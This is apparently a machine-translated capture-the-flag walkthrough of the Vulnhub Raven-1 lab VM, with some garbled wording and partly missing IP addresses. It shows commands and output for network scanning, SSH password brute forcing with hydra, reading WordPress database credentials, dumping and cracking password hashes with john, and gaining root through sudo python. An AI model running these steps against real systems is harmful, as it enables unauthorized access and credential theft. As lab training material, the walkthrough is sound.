Vulnhub customs clearance manual - 03 Raven-1

Background overview:

Download address:,256/

The IP of the target is 100.10 10.132, add the IP address to the hosts file and map it to the domain name Raven local.

1. Information collection

1.1 scan target host IP

Use the ARP scan - L command to scan the surviving hosts in the LAN.

└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4:
Starting arp-scan 1.9.7 with 256 hosts (     00:50:56:c0:00:08       VMware, Inc.   00:0c:29:5a:b1:05       VMware, Inc.   00:50:56:f5:d5:54       VMware, Inc.   00:50:56:e1:62:61       VMware, Inc.

According to the MAC address, we can find that the IP address of our target is 100.10 10.132.

1.2 scan open port of target host

Use nmap to scan the open port of the target host, and use the command nmap - SS - PN - P 1-65535 100.10 10.132.

└─# nmap -sS -Pn -p 1-65535  
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-12-28 09:41 CST
Nmap scan report for
Host is up (0.00083s latency).
Not shown: 65531 closed ports
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
40396/tcp open  unknown
MAC Address: 00:0C:29:5A:B1:05 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 22.46 seconds

According to the results, the target host has opened ports 22, 80, 111 and 40396.

2. Web site detection

2.1 get the first Flag

Through information collection, we found that the target host opened port 80, so we went to the web page to view the relevant source code. We found http://raven.local/service.html The source code under this url link has a flag field - <-- flag1{b9bbcb33e11b80be759c4e844862482d} -->

2.2 wordpress scanning

Found on Web page http://raven.local/wordpress/ There is a WordPress field under the url. Therefore, it can be inferred that the site is built using WordPress, a cms framework. Therefore, WP scan can be used for scanning.

First, update the vulnerability library.

wp-scan --update

Then scan the url.

wp-scan --url http://raven.local/wordpress/

According to the scanning results, the following results are obtained:

server: Apache/2.4.10 (Debian)

WordPress version 4.8.17

It can be found that there is nothing to use.

2.3 SSH service

We found that the site exists urlhttp://raven.local/wordpress/index.php/author/michael/ , found that the user name is MICHAEL.

You can try SSH service blasting with this user name.

Use hydra to generate a dictionary for password blasting. The dictionary uses the most classic FastTrack txt.

hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local

No password.

Let's change to the dictionary generated by cupp and do it again. [ cpuu installation tutorial]

└─# cupp -i
 ___________!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | ]
                            [ Mebus |]

[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: michael                    # enter one user name
> Surname: michael                       # enter one user name
> Nickname: michael                      # enter one user name
> Birthdate (DDMMYYYY):   

> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 

> Child's name: 
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 

> Pet's name: 
> Company name: 

> Do you want to add some key words about the victim? Y/[N]: 
> Do you want to add special chars at the end of words? Y/[N]: 
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 60 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!

Use the command Hydra - L Michael - P/ michael.txt ssh://raven.local , generate the file Michael Txt, use the file to blast again.

└─# hydra -l michael -P ./michael.txt ssh://raven.local                     
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2021-12-28 14:49:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 60 login tries (l:1/p:60), ~4 tries per task
[DATA] attacking ssh://raven.local:22/
[22][ssh] host: raven.local   login: michael   password: michael
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra ( finished at 2021-12-28 14:49:37

The account number is michael and the password is michael.

Log in with this account and password. The command is ssh michael@raven.local . You will be prompted whether to connect. Enter yes.

─# ssh michael@raven.local                                                                                             255 ⨯
The authenticity of host 'raven.local (' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'raven.local' (ECDSA) to the list of known hosts.
michael@raven.local's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Dec 27 18:25:22 2021 from

3. Right raising

3.1 kernel version

Use the command uname -a to view the kernel version.

michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

No exploitable vulnerabilities were found.

3.2 SUID right raising

Check the SUID.

michael@Raven:~$ find / -user root -perm -4000 -print 2>/dev/null

There is nothing to use.

3.3 MySQL login

Traverse the site directory / var/www and find Flag2 Txt file.

michael@Raven:~$ cd /var/www
michael@Raven:/var/www$ ls
flag2.txt  html
michael@Raven:/var/www$ cat flag2.txt

Check the website configuration file / var / www / HTML / WordPress / WP config php.

michael@Raven:/var/www/html/wordpress$ cat wp-config.php
 * The base configuration for WordPress
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 * This file contains the following configurations:
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * @link
 * @package WordPress

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost')

The MySQL account root and password are found R@v3nSecurity .

Use the command MySQL - H localhost - U root- pR@v3nSecurity Connect to MySQL database.

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.


3.4 operation database

Use the command show databases;, View the current database.

mysql> show databases;
| Database           |
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
4 rows in set (0.00 sec)

Use the command use wordpress to enter the wordpress database.

mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Use the command show tables to view which tables exist in the current database.

mysql> show tables;
| Tables_in_wordpress   |
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
12 rows in set (0.00 sec)

Use the command select * from wp_users, view WP_ The contents of the users table.

mysql> select * from wp_users;
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        |  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
2 rows in set (0.00 sec)

It is found that the user name steven exists and the password of the user name $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W /. The password is encrypted.

First export the account password as txt text.

mysql> SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';
Query OK, 2 rows affected (0.00 sec)

View the text content.

michael@Raven:/usr/share$ cat /tmp/wordpress.txt

3.5 file transfer

Start the http service on the target host for WordPress Txt file transfer. Enter the / tmp directory on the target host and run the command python -m SimpleHTTPServer 8888.

michael@Raven:/tmp$ python -m SimpleHTTPServer 8888
Serving HTTP on port 8888 ...

Download of the target host on kali Txt file. Using the command wget http://raven.local:8888/wordpress.txt .

└─# wget http://raven.local:8888/wordpress.txt  
--2021-12-28 16:27:32--  http://raven.local:8888/wordpress.txt
 Resolving host raven.local (raven.local)...
 on connection raven.local (raven.local)||:8888... Connected.
Issued HTTP Request, waiting for response... 200 OK
 Length: 85 [text/plain]
Saving to: "wordpress.txt"

wordpress.txt                   100%[=====================================================>]      85  --.-KB/s  Time 0 s      

2021-12-28 16:27:32 (1.47 MB/s) - Saved“ wordpress.txt" [85/85])

3.6 John password cracking

Use the famous rockyou Txt (kali's own) dictionary to blow up the password. Run the following command in the usr/share/wordlists directory to generate the rockyou.txt file.

dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz
gzip -d rockyou.txt.gz

On the kali machine, enter WordPress Txt file, run the following command, and use john to crack the password.

└─# john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84           (steven)

The password of steven account is pink84.

Use this account to ssh a remote connection. Using the command ssh steven@raven.local .

└─# ssh steven@raven.local                                                   
steven@raven.local's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 27 18:43:33 2021 from

View current user permissions.

$ whoami

3.7 SUDO rights

Try to use sudo Python to raise rights.

Use the command sudo python3 -c 'import pty; pty.spawn("/bin/sh") ', authorization raising failed.

Use the command sudo python -c 'import os; os.system("/bin/sh") ', the right is raised successfully.

$ sudo python -c 'import os; os.system("/bin/sh")'
# whoami

Enter the root directory and view the last flag.

# cd /root
# ls
# cat flag4.txt

| ___ \                     

| |_/ /__ ___   _____ _ __  

|    // _` \ \ / / _ \ '_ \ 

| |\ \ (_| |\ V /  __/ | | |

\_| \_\__,_| \_/ \___|_| |_|


CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought: 

@mccannwj /

Keywords: Linux security macOS

Added by textbox on Wed, 29 Dec 2021 19:30:51 +0200